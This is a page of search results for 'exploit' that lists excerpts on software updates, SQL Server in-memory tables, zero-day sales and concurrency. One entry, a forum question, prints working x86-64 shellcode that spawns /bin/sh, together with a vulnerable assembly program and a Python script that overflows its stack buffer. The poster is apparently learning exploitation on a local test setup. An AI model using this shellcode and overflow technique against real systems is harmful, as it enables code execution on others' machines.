Search Results

Search found 271 results on 11 pages for 'exploit'.

Page 4/11 | < Previous Page | 1 2 3 4 5 6 7 8 9 10 11  | Next Page >

  • [GEEK SCHOOL] Network Security 8: Keep Your System Updated for Security and Stability

    - by Ciprian Rusen
    Another important step in securing any computer or device is setting up automated updates. Your device’s security relies on your operating system, apps, plug-ins, and programs always being up to date. For example, using outdated Internet browsers and plug-ins like Adobe Flash, Java, or Silverlight represents a big security problem. There are many websites on the Internet that exploit security bugs in your browser or the plug-ins you have installed.Click Here to Continue Reading

    Read the article

  • Exploring In-memory OLTP Engine (Hekaton) in SQL Server 2014 CTP1

    The continuing drop in the price of memory has made fast in-memory OLTP increasingly viable. SQL Server 2014 allows you to migrate the most-used tables in an existing database to memory-optimised 'Hekaton' technology, but how you balance between disk tables and in-memory tables for optimum performance requires judgement and experiment. What is this technology, and how can you exploit it? Rob Garrison explains.

    Read the article

  • Much ado about NULL: Exploiting a kernel NULL dereference

    <b>Ksplice:</b> "We think that it&#8217;s important for developers and system administrators to be more knowledgeable about the attacks that black hats regularly use to take control of systems, and so, today, we&#8217;re going to start from where we left off and go all the way to a working exploit for a NULL pointer dereference in a toy kernel module."

    Read the article

  • Google I/O 2012 - Enterprise Geospatial in the Cloud

    Google I/O 2012 - Enterprise Geospatial in the Cloud Sean Maday, Mano Marks Google now offers a powerful and versatile cloud hosting solution for geospatial data and analysis. Learn how your business can exploit this potential to reduce costs, increase productivity, and deliver services to your employees and developers using familiar tools like Google Earth and the Google Maps API. For all I/O 2012 sessions, go to developers.google.com From: GoogleDevelopers Views: 790 9 ratings Time: 55:03 More in Science & Technology

    Read the article

  • Total victory for open source software in a patent lawsuit

    <b>Opensource.com:</b> "Plaintiffs attempted to exploit this inexperience by arguing that open source software involved behavior that was, if not downright illegal, at least ethically dubious. They promoted the fallacy that open source distributors unfairly take the property of others and thereby unfairly profit."

    Read the article

  • SEO Techniques to Make Your Website Visible

    SEO techniques are no hidden secrets, though they work only for websites that exploit them profusely. Misinterpreted as tricks to please search engines, Search Engine Optimization techniques are actually the codes of conduct for well-behaved websites.

    Read the article

  • Microsoft Press deal of the Day 11/October/2013 - F# for C# Developers

    - by TATWORTH
    Originally posted on: http://geekswithblogs.net/TATWORTH/archive/2013/10/11/microsoft-press-deal-of-the-day-11october2013---f-for.aspxToday, 11/October/2013, O'Reilly on behalf of Microsoft Press are offering 50% off F# for C# developers. Just remember to use the code MSDEAL when you check out. "Extend your C# skills to F#—and create data-rich computational and parallel software components faster and more efficiently. Focusing on F# 3.0 and Microsoft Visual Studio 2012, you’ll learn how to exploit F# features to solve both computationally-complex problems as well as everyday programming tasks"

    Read the article

  • Un ordinateur réussit pour la première fois le test de Turing en se faisant passer pour un garçon de 13 ans

    Un ordinateur réussit pour la première fois le test de Turing en se faisant passer pour un garçon de 13 ansUn ordinateur grâce à un programme informatique a réussi pour la première fois à convaincre des chercheurs qu'il était un enfant de 13 ans, devenant ainsi la première machine à passer le test Turing.L'exploit réalisé par cette machine marque une date qui sera probablement écrite dans les annales de l'informatique et plus précisément de l'intelligence artificielle. Le test de Turing a été établi...

    Read the article

  • 10 Things You Should Do After You Install WordPress

    It's a good idea to go to your server and locate the WordPress instruction and installation file that is automatically uploaded with the WordPress software. You need to rename this file to something random and hard to guess. This is a preventative measure to deter hackers from easily finding that your site runs WordPress and trying to exploit any vulnerabilities in the software.

    Read the article

  • Windows 8 : Vupen refuse de donner ses failles 0-days à des « multi-milliardaires » comme Microsoft, le français les garde pour ses clients

    Vupen content que des chercheurs de failles ne les livrent pas à des éditeurs « multi-milliardaires » Et vend les 0-days de Windows 8 à ses clients sans les communiquer à Microsoft Fin octobre, Vupen avait affirmé par la voix de son PDG - Chaouki BEKRAR - avoir découvert plusieurs failles dans IE 10 qui permettaient de corrompre Windows 8. Et ce malgré les avancés du système de sécurité du nouvel OS. La société basée à Montpellier n'a donné depuis aucune information sur son exploit (au sens informatique du terme). Elle a revanche immédiatement

    Read the article

  • Windows 8 : Vupen refuse de donner ses failles 0-days à des « multi-milliardaires » comme Microsoft, le français préfère les vendre

    Vupen content que des chercheurs de failles ne les livrent pas à des éditeurs « multi-milliardaires » Et vend les 0-days de Windows 8 à ses clients sans les communiquer à Microsoft Fin octobre, Vupen avait affirmé par la voix de son PDG - Chaouki BEKRAR - avoir découvert plusieurs failles dans Internet Explorer 10 qui permettaient de corrompre Windows 8. Et ce malgré les avancés du système de sécurité du nouvel OS. La société basée à Montpellier n'a donné depuis aucune information sur son exploit (au sens informatique du terme). Elle a, en revanche, immédiatement

    Read the article

  • Concurrent Affairs

    - by Tony Davis
    I once wrote an editorial, multi-core mania, on the conundrum of ever-increasing numbers of processor cores, but without the concurrent programming techniques to get anywhere near exploiting their performance potential. I came to the.controversial.conclusion that, while the problem loomed for all procedural languages, it was not a big issue for the vast majority of programmers. Two years later, I still think most programmers don't concern themselves overly with this issue, but I do think that's a bigger problem than I originally implied. Firstly, is the performance boost from writing code that can fully exploit all available cores worth the cost of the additional programming complexity? Right now, with quad-core processors that, at best, can make our programs four times faster, the answer is still no for many applications. But what happens in a few years, as the number of cores grows to 100 or even 1000? At this point, it becomes very hard to ignore the potential gains from exploiting concurrency. Possibly, I was optimistic to assume that, by the time we have 100-core processors, and most applications really needed to exploit them, some technology would be around to allow us to do so with relative ease. The ideal solution would be one that allows programmers to forget about the problem, in much the same way that garbage collection removed the need to worry too much about memory allocation. From all I can find on the topic, though, there is only a remote likelihood that we'll ever have a compiler that takes a program written in a single-threaded style and "auto-magically" converts it into an efficient, correct, multi-threaded program. At the same time, it seems clear that what is currently the most common solution, multi-threaded programming with shared memory, is unsustainable. As soon as a piece of state can be changed by a different thread of execution, the potential number of execution paths through your program grows exponentially with the number of threads. If you have two threads, each executing n instructions, then there are 2^n possible "interleavings" of those instructions. Of course, many of those interleavings will have identical behavior, but several won't. Not only does this make understanding how a program works an order of magnitude harder, but it will also result in irreproducible, non-deterministic, bugs. And of course, the problem will be many times worse when you have a hundred or a thousand threads. So what is the answer? All of the possible alternatives require a change in the way we write programs and, currently, seem to be plagued by performance issues. Software transactional memory (STM) applies the ideas of database transactions, and optimistic concurrency control, to memory. However, working out how to break down your program into sufficiently small transactions, so as to avoid contention issues, isn't easy. Another approach is concurrency with actors, where instead of having threads share memory, each thread runs in complete isolation, and communicates with others by passing messages. It simplifies concurrent programs but still has performance issues, if the threads need to operate on the same large piece of data. There are doubtless other possible solutions that I haven't mentioned, and I would love to know to what extent you, as a developer, are considering the problem of multi-core concurrency, what solution you currently favor, and why. Cheers, Tony.

    Read the article

  • Shellcode for a simple stack overflow doesn't start a shell

    - by henning
    Hi, I played around with buffer overflows on Linux (amd64) and tried exploiting a simple program, but it failed. I disabled the security features (address space layout randomization with sysctl -w kernel.randomize_va_space=0 and nx bit in the bios). It jumps to the stack and executes the shellcode, but it doesn't start a shell. Seems like the execve syscall fails. Any idea what's wrong? Running the shellcode standalone works just fine. Bonus question: Why do I need to set rax to zero before calling printf? (See comment in the code) Vulnerable file buffer.s: .data .fmtsp: .string "Stackpointer %p\n" .fmtjump: .string "Jump to %p\n" .text .global main main: push %rbp mov %rsp, %rbp sub $120, %rsp # calling printf without setting rax # to zero results in a segfault. why? xor %rax, %rax mov %rsp, %rsi mov $.fmtsp, %rdi call printf mov %rsp, %rdi call gets xor %rax, %rax mov $.fmtjump, %rdi mov 8(%rbp), %rsi call printf xor %rax, %rax leave ret shellcode.s .text .global main main: mov $0x68732f6e69622fff, %rbx shr $0x8, %rbx push %rbx mov %rsp, %rdi xor %rsi, %rsi xor %rdx, %rdx xor %rax, %rax add $0x3b, %rax syscall exploit.py shellcode = "\x48\xbb\xff\x2f\x62\x69\x6e\x2f\x73\x68\x48\xc1\xeb\x08\x53\x48\x89\xe7\x48\x31\xf6\x48\x31\xd2\x48\x31\xc0\x48\x83\xc0\x3b\x0f\x05" stackpointer = "\x7f\xff\xff\xff\xe3\x28" output = shellcode output += 'a' * (120 - len(shellcode)) # fill buffer output += 'b' * 8 # override stored base pointer output += ''.join(reversed(stackpointer)) print output Compiled with: $ gcc -o buffer buffer.s $ gcc -o shellcode shellcode.s Started with: $ python exploit.py | ./buffer Stackpointer 0x7fffffffe328 Jump to 0x7fffffffe328

    Read the article

  • Disabling SMB2 on Windows Server 2008

    - by Alan B
    There are a couple of reasons you might do this, the first is an exploit. The second is potential locking and corruption issues with legacy flat-file databases. There is a performance penalty in doing this - but how noticeable is it? What other reasons are there for not disabling SMB2 (assuming the security vulnerability is fixed) ?

    Read the article

  • Is the recent Java bug something to worry about?

    - by Keith
    Recently saw this announcement on the H blog about a big hole in Java: http://www.h-online.com/security/news/item/Java-exploit-launches-local-Windows-applications-974652.html But I can't seem to get anyone to think it's a big deal. The fact that I cn visit a web site and it runs calc.exe on my local box is just plain scary... Why is there no bigger response to this??

    Read the article

  • Could I get secure proxy server service free? [closed]

    - by lamwaiman1988
    It comes to my mind that when I use any proxy server, the information will be submit to the proxy server including the username/password of any website I login. This way I risk my identity. I've heard that there are some secure proxy server but can I found any with reasonable price, probably free? ( By the way, VPN is also considered but they are expensive for personal usage ). Even if I can find such service, how can I know that they won't exploit my information?

    Read the article

  • Thoughts on MPM-ITK?

    - by Rich
    I have several sites on my server set up as virtual hosts. What are your thoughts on MPM-ITK? Are the tradeoffs and the potential root exploit vulnerability worth the security of internal system files? http://mpm-itk.sesse.net/

    Read the article

< Previous Page | 1 2 3 4 5 6 7 8 9 10 11  | Next Page >